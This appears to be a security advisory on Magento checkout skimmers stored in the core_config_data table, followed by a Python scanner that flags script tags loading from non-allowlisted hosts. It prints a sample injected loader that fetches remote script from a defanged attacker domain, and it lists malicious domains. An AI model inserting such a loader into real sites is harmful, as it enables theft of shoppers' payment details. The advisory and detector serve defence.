Description: Injection of malicious scripts into Magento checkout pages. The scripts steal entered payment details and send them to remote third-party sites.
The scripts are typically injected into the core_config_data table.
Sample:
<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = '//mcloudjs[.]com/ext/htc.css?cloud=23555534255262'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>
Domains involved: googieapls[.]com, mcloudjs[.]com
For additional details check the Ecommerce security category of our blog.
Affecting: Magento
Mitigation: How to clean a hacked Magento site
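
A defender-side check for the injection described above, added here as an example and not part of the original page: it scans rows exported from core_config_data for script markup that loads from hosts outside an allowlist. The rows, their config_id values, shop.example.com and cdn.example.net are constructed, and the allowlist is an assumption to replace with the store's own hosts.

```python
import re
from urllib.parse import urlparse

# Domains from this page, kept defanged; refanged only for comparison.
PAGE_DOMAINS = {"mcloudjs[.]com", "googieapls[.]com"}
# Assumption: hosts this store legitimately loads scripts from.
ALLOWED_HOSTS = {"shop.example.com"}

# Constructed rows, as returned by:
#   SELECT config_id, path, value FROM core_config_data;
ROWS = [
    (101, "design/head/includes",
     "<scri pt type=\"text/javascript\">var po = document.createElement('script'); "
     "po.src = '//mcloudjs[.]com/ext/htc.css?cloud=23555534255262';</script>"),
    (102, "design/footer/absolute_footer",
     '<script src="https://shop.example.com/js/chat.js"></script>'),
    (104, "design/head/includes", '<script src="//cdn.example.net/t.js"></script>'),
]

# Script tags (including the split form used in the sample) or createElement('script')
SCRIPT_RE = re.compile(r"""<\s*scri\s?pt\b|createElement\(\s*['"]script""", re.I)
# Matches src="..." attributes and JS assignments such as po.src = '...'
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)

def script_hosts(value):
    """Hosts referenced by src in a config value that contains script markup."""
    value = (value or "").replace("[.]", ".")  # accept defanged input too
    if not SCRIPT_RE.search(value):
        return set()
    hosts = set()
    for url in SRC_RE.findall(value):
        # Protocol-relative URLs (//host/path) need a scheme to parse.
        host = urlparse("https:" + url if url.startswith("//") else url).hostname
        if host:
            hosts.add(host.lower())
    return hosts

def scan(rows, allowed=ALLOWED_HOSTS):
    """Return (config_id, path, host, status) for each non-allowlisted host."""
    bad = {d.replace("[.]", ".") for d in PAGE_DOMAINS}
    findings = []
    for config_id, path, value in rows:
        for host in sorted(script_hosts(value) - set(allowed)):
            listed = any(host == d or host.endswith("." + d) for d in bad)
            findings.append((config_id, path, host, "listed" if listed else "review"))
    return findings

if __name__ == "__main__":
    print(scan(ROWS))
```

Hosts marked "review" are not on this page's domain list but still load script from outside the allowlist, so they need a manual look before the row is trusted.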